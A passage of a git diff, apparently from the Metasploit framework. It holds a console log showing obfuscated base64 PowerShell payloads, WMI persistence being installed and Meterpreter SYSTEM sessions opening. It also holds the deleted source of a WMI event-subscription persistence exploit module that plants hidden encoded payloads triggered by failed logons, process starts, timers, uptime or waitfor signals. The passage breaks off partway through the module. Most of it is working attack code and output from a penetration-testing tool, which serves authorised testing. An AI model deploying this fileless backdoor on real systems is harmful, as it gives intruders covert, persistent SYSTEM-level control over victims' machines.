NAB2AFgAJwArACcARQBlAGsAVAArAFMAMQBjAEYALwBpAHsAMgB9ACsAcwBRAEwANgAwAGoAZgBiAGsAbgBuADgAYgBVAFEAKwBzAEwAOABXADIAeAA2AHoAMQB4AFcAVgBIAFAAawBnADQAOQBnAEYAdgBDAHIAMAByADYAbwBQADUAcQB4AGYAMgBiAHIAbAA4AFMAMwB3AFYANAAzAG4AagBkAFMAKwBKAC8ARABsADgAMgA2AEkAUgA0AE8AeQAnACsAJwBHAGUAOABEAHIAUQB6AFQAMwAyACcAKwAnAHAAdgA2AHMAUgBIADkATAA5AGoAWAB2AGgAYwBlAFgAMQBKAGQAaQA5AHgAbAA0AHYAaABKADMAMQB4AC8AZAByADkARQBIADQAdABoAFMAaAA5AHkAUABQAHsAMQB9AEEARABTAC8AbwBkADYAZABlAG0AVgBkADcATABuAHgAcABkAEgAJwArACcASgBpAFAANwBtAHYARQAyADQAOQB2AGYATgBiADMAbwB6AGIAMQBMAFMAdgBYAHMAUQBhAC8AdgBxAFcAKwBrAHYAVwBEADYAMAAvADgAVQBiADMANgBoAFAANgBVADYATQB6AEEAZgBlAE8AOQA5AGMAOQB4AGMATAA0AC8ARQBpAGYAWgAnACsAJwBjAFEAdwAvAHEAawBqAHoAZwAvAFYAYQBjAFoASgAnACsAJwBPAHUATAA3AGUAVQBKAGQAZAB6ACsAVwBIAHIAbABQADAAUwBMAG8AcABuAE8AcABPAEYANQA2ADYAUAB2AG4AZQB1AHQAKwBtAGYAbABBADYAOABRADEAOABSADgAUwBoAGIAMQA2AGMARQAnACsAJwBVAC8AaAB1AFkATgBQAFkAKwBxAFgANABxAFUANgAxAHYAVQBKADUAUABPAGUATwBIAHgAMwBuAFcAagBFAHkANwA3AHQAKwB0AHIAMQBvAFYALwB4AHkAMwBPAEkAYwBKAC8AeAB2ADMAQwBkADAAUQArAHIAVABzAG0AUABUAC8AZwAvADcAdgB4AGIATwB7ADEAfQA3ADYAdgBrADMANQBzAE0ASAAvAGwASAAnACsAJwArAG4AMgBIAGQARgAzAHAATwB2ADgASgBGACsAcABrAHcANgBrAEgAUgA4AG4AMwBnAGcALwBkAE4AMQBrAGYAcAByACsAbgBIADMAUABTAFYAMgBlAEwANgBRAG4AWgBYADEAcQArAHgAdwBMAE0AaAB6ADYAOABXAHkAVABIADMANgB5AG4AcQAzAGgAeQBmAEgAcgBGAE0ANwBUAHMAYgByAEcAVgB5AEUAeAB4AGcANwBsAHUANQByAEwAdABDAHgAUgArAHkAYgB1AG8AOQB4AFAAMwBOAG0AbgBXAC8AaAB5AFMAWAAyADUAZQBTADEAMQBqAEgAZgBoAFkAOQA1AHYAewAxAH0AWABQAFQAWAAzAHoATAAnACsAJwBmADIAUgA3AEYAbQArADgAZgBMAEEAZAArADAAcgAvAGIAMQB6ADMAKwBSADYAMAA3AEQAKwBvACsAcwBzAHUAaQBlACsAMQBkAFQAewAyAH0AdgB1AGUATABMADYAeAB6ADAATAAwAGEAbgB2AGUAWQBNADYAbABMADUAdQBYAEoAVwA1ADgAbQAzAG0AdwBqADkAYwAzAFcATwA5AFgATAB1AGsAbgAxAFMAdgBlADUAJwArACcAKwAzAHIAagBYAHEAUQArADAAVABxAGoAdgB7ADIAfQAzAFkAdgByAHQATwB7ADIAfQA0ADcAaAB0ACsATAA3AGoAWABXAHUAUABkADgAMQBmAEcAZABkAFgATQBBAEQANgBmAGUARwB2AGsAagB2AGIAOQAxAFAAZwBuAE8AcQA5ADAAdgBYAGMAYwArAFQAewAxAH0ALwBPAEkATwBTAHIAcABZAEUAVgA4AFYAdgBUAGoAVwBuAGYAaQBmAG4ASABkADEAWAB0ADkAMwAvADYARgBmADgAdwBEADUAagAvAHIAdwAwAGYAMwBDAGIAWAA3AFQAdgBoAHsAMgB9AFgAUwBhAGYAYwAvAFIASQBkAGsAawAzAFoALwBSAEYAcQBWADkANABTAG4AVgBVAGYAbQBGAFgAcABIADUAaQBDAFIANgAnACsAJwA2AHIANwBFAFQAWABqAHUATwA3AGkAZABmAHIASgBjAGQAbgB5AGIARQBiACsAaAA4AHEAZAAwAG4AZABQADMAawAxAFAATgBHAG4AdQByACsAMABIADMANwA5AEMAMgB1AGYAZQB2AFAATQAzAHkAdgByAGQATQAxADgANgBqADcAMAB3AFgAOQBnAHYAYQA3AGIAdABNAGMASgBGADYAYwBXADAAOQArACsAZQB1ADYATQAwAGEASAAzAC8AcQBEAHsAMgB9AGoAdQArAGQAZgBQAEwAagByAHkAYgB1AC8AOQBxAHkAZgB1AFMAZgB7ADEAfQB2AHAAbwA5AFMAWABYAEgAZgA5AHgAZABqADYAdgBrAHYAMQBJAHAAMABUAFAASQB7ADIAfQBYADAAcwBNAGQAMwA3AGsAdQBWAGYAQQBvAG4AVwB1AHMAKwBGADQANABuAHYAMwBhADEAMwBHADYANAByADMAbABtAHgANQBrAHIAbQAvAEMANQAxAEEAZgBYAHMAbQBmAGEALwBpAGcANgA5AEwAegBVADAASABkAFAAYgBiAE8AdAB1AG8AdgB5AE8AOQBJAGMAWgAzAGIAbgBpAGYANABjAEoAaQByADMAewAxAH0ALwBWADcAdQA4AHEAZABHAGIAdgBmAGcAcgBlAHYALwBWAGIAegBFAG4ATQBvADQARQBmAHsAMgB9AGIAeQBwAHkAegBUAFgAWAA5AFAAMwA5AFkAegB6AGEAMgBlAHYAKwA1AG8AUgBmAFoAagBlAHYANgBiACsAVQBXAGQALwA3AGQAYwAzAC8AdQBRAG4AYwA0ADcAbgA5AG0ANgBPAHkAcQAwAHIAYwA5ADUATAArAGQAMgBnAFQAMQA4ACcAKwAnADYASABmAE0ANQBoACsAYQBkAHgAegBUADMAdwBxAGMAYQAvAGoAbwBlACcAKwAnAHMANgBEAGUAWAA2AGIAKwBuAC8ATQBDADUAbgBuAHIARwBmAFAARQAwAGQAdQA1AHoATQByADQANwBsAGoAdgBqAHIAbwBtAC8AcgBUAFkAYQA3ADEATQBQAEMANwAnACsAJwBBAFkAOQBIAE4AaQAwAHYAdwBTAHYAUAB4AEYALwBZADMAegBzAHcAegA1AEQAWABuAEgAOAB3ADkANgBoAGUAdQBmAEEANgB7ADIAfQB2AGQAUgBwAG4ALwBlAGMAawBBAGQAcgArAGcAegBaAE8AZgBOADUAVQAwAHUAJwArACcAKwA3AHMARwB0AGEAewAyAH0ATwB1AHMAKwA2AGMAWQBzAFgAegBuAHUAdABMAGIAUgA0AHcAcAB5AHMATwBXADMAZwByADMAbABTADIAdwA3AHIAMgBBADUAeABYADcAbgBjAEwAYwBMADgAbgByADgAZQB1ADQAMwB2AHEAdwB3AGcAZABxADcARwBUAGMAdwBEAHEAMAB4AEMAKwB3AG8AdQBTAGYAVQA2ADcALwB1AGsAcgBkAHIAcABQADgAagB5AGUAbgBYAFIAOQAzADQARgBuAFAAOQB4AHYAbABNAHcAOQAxAHUAdQB7ADEAfQBjADUATwBpADAANgAxAHIAegBtADkAawBYADQAVgBlAHkAVgA3ADMAZgA3AHsAMQB9AHoAYQB7ADIAfQBQAHYASgA2ADYAYgBhAC8AVAA4AHkAZQBkAHMAawBmAHIAeABKAGYAMwB0ADAAUABwAFgATwBWADgAYQA2AGIAJwArACcAegBQADUAZQBqAHYAMwBJAGYAZgBnACsAZQBJAGMAdwB5AGYAeQB5AFEAZABWAHQAMgBZADgAOQAzAGEALwBMAFAAZgA1AC8AaABiAHcARgBQADUAVQA1AE4AMwBuAEUAKwBVAEMAZgArAEMATwB0AFQAegBmAFAALwBpAE8AbQAnACsAJwBJAGQAYQBiAHAANQBvAHsAMQB9AHsAMQB9AFAAYwBsADIAeABuAGYAUgBGAEgAYwAvAE4AbwA3ADcAegAvAFUALwBPAEMAYgBkAE4ANABsAG4AewAyAH0ASABOADIAcgAwAG4AbQBNAGMAUABXAGMAMQBEAGMALwBQADgASQB2AHoAdwAxAEQAOAArAEQARgA5AFkAUgA1AE4AYwBYAGwAdwBIAHUAZgBkADAAMwBvAGwANQBoAFgAWABUADgAdQA0AE0ATQBYAGQAUABlAEcAYwA3ADUAMABuAHUAZAB6AHAAbgBtAFoAZQBGAHcAUwAzAHcALwBPAFYANQAvAFQAVABlAEEARAAvAHMAewAxAH0AYgBwAEUAZABqAHIAcgBYAGoAcwAzAHUAcgBTAHcAVgArAEQAdQB7ADIAfQBkADAAbQAzAHIAZAA5AC8AbgBnADEAUAAzADAAYwB3AEgAMQBPAGwATwBqADgAZABsAG0AagB1AHYATwBwADUAdABtADYAUwB6AFMAVgBjAHUAOABlAGMAaAB6AFYAYwA4AHQAMwArAEgAOAA5AG8AVAA4ADQATwArAGsAegByAFYAVQByAGUAdABIADgAcwAwAFgAOQBKAG4ANwB2AEQAegBqAG4AaQB1AHUAbgBsADMAdwB6AG0AUwBuAHEAOABqAG4AVwArAHQAeQBNAE8AKwA1AHkALwBYAHIAeQBsADQAMABHADkANwAzAG0AUQBPAFQALwBaADYAcgBpAFMAZQA3AGkAZAAyADgAUABXAFIALwBuAE0AYwBDAGMAOQBEAG4AaAAvAHkAYgBmADMAcgB2AE8AVwBrAE8ANQBjADUAUwB1AGMAUwB4AE4AZgBuAHsAMgB9AEEAWABuAFMAUQB1AGYATQArAHoAUwB2AE8AWAA2AFEAMQA5ADIAUgBGADcAOAA3AEgAaQBYAC8AKwBvAFgASABIACsAZgA3ADgAegBlAGQAQwAzAEYAYgBlADAANQBaAEkAYwB1ADMAWABiADkALwAzAHYAKwBQADgAUgBsAFQASgAxAEkALwBsACsAeAAvAGkAWgBTADMAcABTAGUAbQA1AHgALwAvAGwAOQA1AGUAMABZAGQATQBVADkAegA2AGoAYwA2AFEAbAAvAHgANQBzAC8AdgB4AEcAVQBUADYAUgB6AEUAZQBhADMAMwAxAE4AZABtAGYAaQA4ADQASgArAHEAdQAyAEYAMgBHADUAMQBMAFoANABmAHMAcgBjAE8AbgBuADMARAA5AHgAWAAzAHIAZABIAGUAOQA5ADUAWABvAFYAMgBRADIANgB0AEUAVgBIAHgAZABzAGwAKwB2AEwAaABqAEwANwA2AEUAOQBlAFMAOAAxAFQAWgB2ADMAYgArAGUAUAA1ADQAewAyAH0AYgA4AGIAZABPAFAALwAvACcAKwAnAGMAOQA1AGoAUAB1AEQAewAxAH0AagA2AFgASQBYAHoAMgBuAFoANABVAHEAYwA4AFYAbgA5AGIAbwBNACsAYwBZAGIAYgBKAEgAZAB2ADMAQQAzADYAWAAnACsAJwB6AHMAcQBUAGYAZQAwADcAbgBkADUAegB6AE4ARwA5ADIATAA5ADIAZgBVAFYAZQBpAHcAYQArAFoAegAxAFYAeQArAEQAewAyAH0AQwA1ADAAdgBYAEgAJwArACcAKwBWAFIARwAvADkANgA5ADkAdgBmADMAbABWAFAAMgA4AGQAMwAvAC8AZwBmAGYAegByAGcAdgBiAFUAWQBBAEEAQQB7ADAAfQAnACkALQBmACcAPQAnACwAJwBLACcALAAnAEIAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAA== -InputFormat None +[+] Payload successfully staged. +[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAbQA4AEkAVwBrAEMAQQA0ADIATwBRAFEAdQBDAFEAQgBTAEUALwA0AHEASABEAFoAWABTAFUAMwBRAHcATwBxAFIAWQBWAEkAJwArACcAYwBPAFoAZwBRAFMAcwBlAHAARABOAHYAVgB0ADcAQwA1AGkAWgB2ACsAOQBsAFEAbwA2ADkAawA3AEQAbQArAEcAYgBTAFUASgBzAG0ATwBCAFkAQQA2AHEAewAwAH0ANQA2ADEAQgAvAFQAeQBPAFYARABDAGEAVgBpAEEAdABNADUAWQBnAFQATgBzAHQANABTADcANwBDAEMAcgBJAGwAQgBNAHAAdwBiAEEAdwBkAHQAdgBDAHAAOAB0AFQAMABFAGQAYwBLAEcAZQBmAFgAcgBYAFgAewAxAH0AeAA2AGsAeQA4AGUATAA1AEIAKwA2AFIAUwA2AFQARAAvADgANQAzADIAJwArACcARABEAFMAMwBEAEMAOQBpAFoAQQAnACsAJwBTAHMAYgBSAEkAQgBhAHgAawBnAE8AMAB5AGcAMAB4ADQANwBtAHUAMQBLAFEAWQBtAGQAYgBnAGEAdQBKADcAeABoAEEASwBPAEQAWQBnAGgAcQBLAFYANABMAFYAUABKAGMAeQBtAFgANwBmAEwANwBlAEYAZQBFAGQAUABKAEYAKwA4AEEAQQBBAEEAewAyAH0AJwApAC0AZgAnAHoAJwAsACcAagAnACwAJwA9ACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAbQA4AEkAVwBrAEMAQQA0ADIATwBRAFEAdQBDAFEAQgBTAEUALwA0AHEASABEAFoAWABTAFUAMwBRAHcATwBxAFIAWQBWAEkAJwArACcAYwBPAFoAZwBRAFMAcwBlAHAARABOAHYAVgB0ADcAQwA1AGkAWgB2ACsAOQBsAFEAbwA2ADkAawA3AEQAbQArAEcAYgBTAFUASgBzAG0ATwBCAFkAQQA2AHEAewAwAH0ANQA2ADEAQgAvAFQAeQBPAFYARABDAGEAVgBpAEEAdABNADUAWQBnAFQATgBzAHQANABTADcANwBDAEMAcgBJAGwAQgBNAHAAdwBiAEEAdwBkAHQAdgBDAHAAOAB0AFQAMABFAGQAYwBLAEcAZQBmAFgAcgBYAFgAewAxAH0AeAA2AGsAeQA4AGUATAA1AEIAKwA2AFIAUwA2AFQARAAvADgANQAzADIAJwArACcARABEAFMAMwBEAEMAOQBpAFoAQQAnACsAJwBTAHMAYgBSAEkAQgBhAHgAawBnAE8AMAB5AGcAMAB4ADQANwBtAHUAMQBLAFEAWQBtAGQAYgBnAGEAdQBKADcAeABoAEEASwBPAEQAWQBnAGgAcQBLAFYANABMAFYAUABKAGMAeQBtAFgANwBmAEwANwBlAEYAZQBFAGQAUABKAEYAKwA4AEEAQQBBAEEAewAyAH0AJwApAC0AZgAnAHoAJwAsACcAagAnACwAJwA9ACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None +[+] Cleaning up 5896 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAMgA4ACcAKwAnAEkAVwBrAEMAQQA0AHQAMgB6AFMAdgBMAEwATQByAFAAeQAwADMATgBLADQAewAwAH0AMQBzAG4ASgBQAEwAVQBFAFMAQwBFAHMAcwB5AGsAeABNAHkAawBrAHQAMQBsAEEAUABMAFUANAB0AFUAdABmAFUAeQAwADYAdABMAEsANABKAFQAcwAxAEoAVABTADcAUgBEAFMANABwAHkAcwB4AEwAVgAvAEQAMgBTAG4AZABLAGQASQB4AHcAcgAnACsAJwBsAEcAdABqAGsAWQAxAEwAQgBpAHIAWQBSAG8AcQA4AFQAbwBxAGUAYQBVADUAewAxAH0AVABwAFEAUQAyAHMAQgBDAEUAdgBLAFgANABRAEEAQQBBAEEAPQAnACkALQBmACcAbQAnACwAJwBPACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBNAGYAcQBOAEoAYQBBAEUAJwA7AA== -InputFormat None +[+] Persistence installed! +[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251122.3630/WIN10PROLICENSE_20251122.3630.rc +[*] Sending stage (188998 bytes) to 2.2.2.2 +[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49706) at 2025-11-22 08:39:07 -0500 +[*] Sending stage (188998 bytes) to 2.2.2.2 +[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49707) at 2025-11-22 08:40:06 -0500 +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > sessions -i 2 +[*] Starting interaction with 2... + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +``` diff --git a/modules/exploits/windows/local/wmi_persistence.rb b/modules/exploits/windows/local/wmi_persistence.rb deleted file mode 100644 index da45657a5ca85..0000000000000 --- a/modules/exploits/windows/local/wmi_persistence.rb +++ /dev/null @@ -1,230 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Exploit::Local - Rank = NormalRanking - - include Msf::Post::Windows::Powershell - include Msf::Exploit::Powershell - include Post::Windows::Priv - include Msf::Post::File - - def initialize(info = {}) - super( - update_info( - info, - 'Name' => 'WMI Event Subscription Persistence', - 'Description' => %q{ - This module will create a permanent WMI event subscription to achieve file-less persistence using one - of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER - (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing - must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon - /failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload. - The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON - method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS - method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method - creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER - before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command - (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is - activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a - high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations. - }, - 'Author' => ['Nick Tyrer <@NickTyrer>'], - 'License' => MSF_LICENSE, - 'Privileged' => true, - 'Platform' => 'win', - 'SessionTypes' => ['meterpreter'], - 'Targets' => [['Windows', {}]], - 'DisclosureDate' => '2017-06-06', - 'DefaultTarget' => 0, - 'DefaultOptions' => { - 'DisablePayloadHandler' => true - }, - 'References' => [ - ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], - ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'] - ], - 'Notes' => { - 'Reliability' => UNKNOWN_RELIABILITY, - 'Stability' => UNKNOWN_STABILITY, - 'SideEffects' => UNKNOWN_SIDE_EFFECTS - } - ) - ) - - register_options([ - OptEnum.new('PERSISTENCE_METHOD', - [true, 'Method to trigger the payload.', 'EVENT', ['EVENT', 'INTERVAL', 'LOGON', 'PROCESS', 'WAITFOR']]), - OptInt.new('EVENT_ID_TRIGGER', - [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]), - OptString.new('USERNAME_TRIGGER', - [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]), - OptString.new('PROCESS_TRIGGER', - [true, 'The process name to trigger the payload. (Default: CALC.EXE)', 'CALC.EXE' ]), - OptString.new('WAITFOR_TRIGGER', - [true, 'The word to trigger the payload. (Default: CALL)', 'CALL' ]), - OptInt.new('CALLBACK_INTERVAL', - [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1800000 ]), - OptString.new('CLASSNAME', - [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]) - ]) - - register_advanced_options( - [ - OptString.new('CUSTOM_PS_COMMAND', - [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be encolsed in quotes)', false, ]), - ] - ) - end - - def exploit - unless have_powershell? - print_error("This module requires powershell to run") - return - end - - unless is_admin? - print_error("This module requires admin privs to run") - return - end - - unless is_high_integrity? - print_error("This module requires UAC to be bypassed first") - return - end - - if is_system? - print_error("This module cannot run as System") - return - end - - host = session.session_host - print_status('Installing Persistence...') - - case datastore['PERSISTENCE_METHOD'] - when 'LOGON' - psh_exec(subscription_logon) - print_good "Persistence installed!" - remove_persistence - when 'INTERVAL' - psh_exec(subscription_interval) - print_good "Persistence installed!" - remove_persistence - when 'EVENT' - psh_exec(subscription_event) - print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\#{host}\\\\C$ -U " + datastore['USERNAME_TRIGGER'] + " \"" - remove_persistence - when 'PROCESS' - psh_exec(subscription_process) - print_good "Persistence installed!" - remove_persistence - when 'WAITFOR' - psh_exec(subscription_waitfor) - print_good "Persistence installed! Call a shell using \"waitfor.exe /S #{host} /SI " + datastore['WAITFOR_TRIGGER'] + "\"" - remove_persistence - end - end - - def build_payload - if datastore['CUSTOM_PS_COMMAND'] - script_in = datastore['CUSTOM_PS_COMMAND'] - compressed_script = compress_script(script_in, eof = nil) - encoded_script = encode_script(compressed_script, eof = nil) - generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) - else - cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) - end - end - - def subscription_logon - command = build_payload - class_name = datastore['CLASSNAME'] - <<-HEREDOC - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - HEREDOC - end - - def subscription_interval - command = build_payload - class_name = datastore['CLASSNAME'] - callback_interval = datastore['CALLBACK_INTERVAL'] - <<-HEREDOC - $timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"} - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - HEREDOC - end - - def subscription_event - command = build_payload - event_id = datastore['EVENT_ID_TRIGGER'] - username = datastore['USERNAME_TRIGGER'] - class_name = datastore['CLASSNAME'] - <<-HEREDOC - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - HEREDOC - end - - def subscription_process - command = build_payload - class_name = datastore['CLASSNAME'] - process_name = datastore['PROCESS_TRIGGER'] - <<-HEREDOC - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - HEREDOC - end - - def subscription_waitfor - command = build_payload - word = datastore['WAITFOR_TRIGGER'] - class_name = datastore['CLASSNAME'] - <<-HEREDOC - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceDeletionEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND Targetinstance.Name = 'waitfor.exe'\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"cmd.exe /C waitfor.exe #{word} && #{command} && taskkill /F /IM cmd.exe\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - $Filter1 = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"Telemetrics\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'} - $Consumer1 = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"Telemetrics\"; CommandLineTemplate = \"waitfor.exe #{word}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1} - Start-Process -FilePath waitfor.exe #{word} -NoNewWindow - HEREDOC - end - - def log_file - host = session.session_host - filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") - logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence', - Rex::FileUtils.clean_path(host + filenameinfo)) - 